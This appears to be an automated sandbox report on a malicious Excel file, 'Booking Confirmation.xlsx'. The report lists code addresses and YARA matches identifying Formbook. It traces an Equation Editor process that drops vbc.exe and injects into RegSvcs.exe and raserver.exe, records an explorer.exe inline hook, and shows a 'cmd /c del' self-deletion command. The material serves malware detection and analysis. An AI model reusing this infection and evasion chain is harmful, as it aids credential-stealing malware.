            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0041D906
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0041DB32
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0041DBA5
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0041E5ED
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00402D90
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0041DE55
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00409E2C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00409E30
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0041DF6E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0041D781
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0041CF93
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00402FB0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0091E0C6
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0094D005
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0093905A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00923040
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0099D06D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0091E2E9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_009C1238
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_009C63BF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_009463DB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0091F3CF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00922305
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00927353
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0096A37B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00955485
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00931489
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_009A443E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0095D47D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0093C5F0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_009A05E3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0092351F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00966540
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00924680
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0092E6C1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0096A634
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_009C2622
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_009A579A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0092C7BC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_009557C3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0099F8C4
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_009BF8EE
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0092C85C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0094286D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_009C098E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_009229B2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_009369FE
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_009A5955
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_009A394B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_009D3A83
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_009CCBA4
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_009ADBDA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0091FBD7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_009A6BCB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00947B00
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_009BFDDD
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00950D3B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0092CD5B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00952E2F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0093EE4C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_009BCFB1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00992FDC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00930F3F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0094DF7C
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_02021238
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01F7E0C6
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01F9905A
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01F83040
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_020263BF
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01FAD005
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01FA63DB
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01F7F3CF
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01FCA37B
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01F87353
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01F82305
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01F7E2E9
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01F9C5F0
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_02022622
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01FC6540
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01F8351F
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01F91489
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01FB5485
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01FBD47D
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_0200579A
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01FB57C3
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_0200443E
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01F8C7BC
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01F8E6C1
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01F84680
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01FCA634
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01F969FE
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01F829B2
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_02033A83
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01FA286D
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01F8C85C
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_0202CBA4
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_0200DBDA
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01F7FBD7
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_0201F8EE
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01FA7B00
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_0200394B
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_02005955
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_0202098E
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01F8CD5B
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01FB0D3B
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_0201CFB1
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01FF2FDC
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01FADF7C
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01F90F3F
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01F9EE4C
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01FB2E2F
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_0201FDDD
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_0013E5ED
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_0013D781
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_00122D90
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_00129E30
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_00129E2C
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_0013DE55
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_0013DF6E
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_0013CF93
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_00122FB0
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01E69862
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01E68132
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01E61069
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01E61072
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01E65B22
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01E6DB0E
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01E65B1F
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01E6DA6F
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01E6AA32
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01E62CEC
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01E62CF2
            Source: Booking Confirmation.xlsxOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 0091E2A8 appears 41 times
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 0091DF5C appears 123 times
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 0098F970 appears 84 times
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 0096373B appears 245 times
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 00963F92 appears 132 times
            Source: C:\Windows\SysWOW64\raserver.exeCode function: String function: 01F7E2A8 appears 38 times
            Source: C:\Windows\SysWOW64\raserver.exeCode function: String function: 01F7DF5C appears 120 times
            Source: C:\Windows\SysWOW64\raserver.exeCode function: String function: 01FC3F92 appears 132 times
            Source: C:\Windows\SysWOW64\raserver.exeCode function: String function: 01FC373B appears 245 times
            Source: C:\Windows\SysWOW64\raserver.exeCode function: String function: 01FEF970 appears 84 times
            Source: 00000005.00000002.2218037649.00000000003A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000005.00000002.2218037649.00000000003A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000004.00000002.2191333109.00000000036C5000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000004.00000002.2191333109.00000000036C5000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000007.00000002.2378175616.0000000000120000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000007.00000002.2378175616.0000000000120000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000007.00000002.2378328002.0000000000290000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000007.00000002.2378328002.0000000000290000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000007.00000002.2378260820.00000000001E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000007.00000002.2378260820.00000000001E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000005.00000002.2218059769.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000005.00000002.2218059769.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000005.00000002.2218005486.0000000000270000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000005.00000002.2218005486.0000000000270000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 5.2.RegSvcs.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 5.2.RegSvcs.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 5.2.RegSvcs.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 5.2.RegSvcs.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: explorer.exe, 00000006.00000000.2197440508.0000000003C40000.00000002.00000001.sdmpBinary or memory string: .VBPud<_
            Source: classification engineClassification label: mal100.troj.expl.evad.winXLSX@9/6@5/3
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$Booking Confirmation.xlsxJump to behavior
            Source: C:\Users\Public\vbc.exeMutant created: \Sessions\1\BaseNamedObjects\JhCZAcEj
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRBB3.tmpJump to behavior
            Source: C:\Users\Public\vbc.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Users\Public\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: Booking Confirmation.xlsxVirustotal: Detection: 31%
            Source: Booking Confirmation.xlsxReversingLabs: Detection: 25%
            Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
            Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
            Source: unknownProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
            Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
            Source: unknownProcess created: C:\Windows\SysWOW64\raserver.exe C:\Windows\SysWOW64\raserver.exe
            Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe'
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
            Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
            Source: C:\Windows\SysWOW64\raserver.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe'
            Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\InprocServer32
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Users\Public\vbc.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
            Source: Booking Confirmation.xlsxStatic file information: File size 2169344 > 1048576
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
            Source: Binary string: RAServer.pdb^ source: RegSvcs.exe, 00000005.00000002.2218050010.00000000003D0000.00000040.00000001.sdmp
            Source: Binary string: wntdll.pdb source: RegSvcs.exe, raserver.exe
            Source: Binary string: RAServer.pdb source: RegSvcs.exe, 00000005.00000002.2218050010.00000000003D0000.00000040.00000001.sdmp
            Source: Binary string: RegSvcs.pdb source: raserver.exe, 00000007.00000002.2378949879.000000000245F000.00000004.00000001.sdmp
            Source: Booking Confirmation.xlsxInitial sample: OLE indicators vbamacros = False
            Source: Booking Confirmation.xlsxInitial sample: OLE indicators encrypted = True
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00E86178 pushad ; ret
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00E85A4C push edx; iretd
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00E85219 push ss; retf
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_004169BB push esi; ret
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0040AB07 push ds; retf
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00414E05 push ss; retf
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0041CEF2 push eax; ret
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0041CEFB push eax; ret
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0041CEA5 push eax; ret
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0041CF5C push eax; ret
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0091DFA1 push ecx; ret
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01F7DFA1 push ecx; ret
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_001369BB push esi; ret
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_0012AB07 push ds; retf
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_00134E05 push ss; retf
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_0013CEA5 push eax; ret
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_0013CEF2 push eax; ret
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_0013CEFB push eax; ret
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_0013CF5C push eax; ret
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01E6E3E6 pushad ; ret
            Source: initial sampleStatic PE information: section name: .text entropy: 7.23266199922
            Source: initial sampleStatic PE information: section name: .text entropy: 7.23266199922
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\svchost[1].exeJump to dropped file
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file

            Boot Survival:

            barindex
            Drops PE files to the user root directoryShow sources
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file

            Hooking and other Techniques for Hiding and Protection:

            barindex
            Modifies the prolog of user mode functions (user mode inline hooks)Show sources
            Source: explorer.exeUser mode code has changed: module: USER32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8D 0xDE 0xE1
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
